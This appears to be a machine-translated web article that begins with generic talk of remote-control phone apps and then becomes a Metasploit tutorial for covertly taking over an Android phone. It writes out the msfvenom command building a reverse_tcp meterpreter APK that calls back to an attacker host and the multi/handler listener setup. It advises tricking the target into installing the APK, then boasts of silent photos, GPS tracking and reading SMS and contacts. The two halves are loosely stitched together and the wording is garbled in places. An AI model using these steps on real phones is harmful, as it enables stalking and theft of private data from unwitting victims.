If we want to control the Android phone remotely, how can we achieve it? Now we basically need to use software to complete. Because it will be easier to do it with software. Many people may not know what the specific operation steps are. Next, let's see how to complete the remote control of Android phones. So how to realize Android remote control mobile phone?
First of all, we need to install the APP on the mobile phone and use the mobile phone to control the mobile phone. Then both mobile phones need to be installed. For the computer, a control terminal that matches the operating system version of the computer needs to be installed on the computer. The way to download the APP on the mobile phone is very simple and direct. For computers, you need to go to the official website to download. The installation method can be installed according to the prompts. Like ordinary software, the download method and installation method are actually very simple.
After installing the software, we also need to register an account. Account registration is very important for using the software, because if you do not have an account, you cannot log in, and you cannot enable the remote control function. Because we need to use the account to bind the host information, when we go to the official website to register, we only need to fill in the account name, set an account password, and then bind our mobile phone number, and finally choose an individual user or an enterprise user, you can register an account that belongs to you.
Because we are using an Android phone, we still need to make certain settings to be able to use the remote control function instead of using the software directly. Under normal circumstances, we will choose to obtain root privileges, but obtaining this privilege will have an impact on our use of mobile phones. Then when using the App, you only need to turn on the auxiliary service in the mobile phone, so that you can use the software for remote control, so this will be more convenient than other software.
If you don't know how to control your Android phone, it's very simple to use the software, and you only need to go through a few simple steps to complete it. And it is also very stable during use, we only need to turn on the auxiliary service to be able to perform remote control anywhere.
In most cases, after the malicious program is installed on the Android phone, it will be more or less remotely controlled, so the attacker obtains the remote silent photo, video, recording, location, and access to the address book and SMS of the target Android phone through instructions in the background It's really nothing to worry about, let's discuss this technology below.
Metasploit in Kali has a tool called msfvenom that can generate numerous versions of payloads, aka executable remotes. For example, we can install the generated Android apk executable program in the target mobile phone through social work, and then complete long-term monitoring or tracking. How to achieve it? Here we will use msfvenom, and then we will look at the method used.
After the Android phone is remotely controlled by kali: realize remote photo taking, positioning, and recording
Generate Android remote control
Enter in the kali terminal:
msfvenom -h view usage help
The parameters we need to pay attention to are -p (specify the attack payload) -f (specify the format of the generated file)
msfvenom -l payloads
msfvenom -l formats
The complete command to generate the remote control:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R test.apk
The -f parameter is not used here to generate an Android executable program, which can be omitted.
Deploy the executable
Install the generated Android remote control app on the target machine, and let the target download and install the apk by building a server.
After the Android phone is remotely controlled by kali: realize remote photo taking, positioning, and recording
Listening with metasploit
start msf
Enter in the Kali terminal: msfconsole
Go ahead and type:
use exploit/multi/handler
This module is dedicated to setting up standalone connection handlers, the last piece of the puzzle we were looking for! In the case of using remote control payloads, it is necessary to set multi/handler, otherwise the process cannot be remotely controlled.
Set parameters for this module:
show options
set LHOST 192.168.31.111
set lport 8888
The settings here must be consistent with the previous settings using msfvenom.
Execute listening, waiting to go online
get meterpreter session
Once the target Android phone (target) user clicks the test.apk icon we generated, our kali will listen to the connection signal and get a meterpreter session to remotely control the target (target) phone. " to display all the commands for remotely controlling Android phones, here we choose the most exciting three:
Take pictures remotely:
The target mobile phone will not notice anything, it belongs to the background system to take pictures;
GPS positioning:
Direct display of longitude and latitude geographic location, very accurate;
View text messages and contacts;
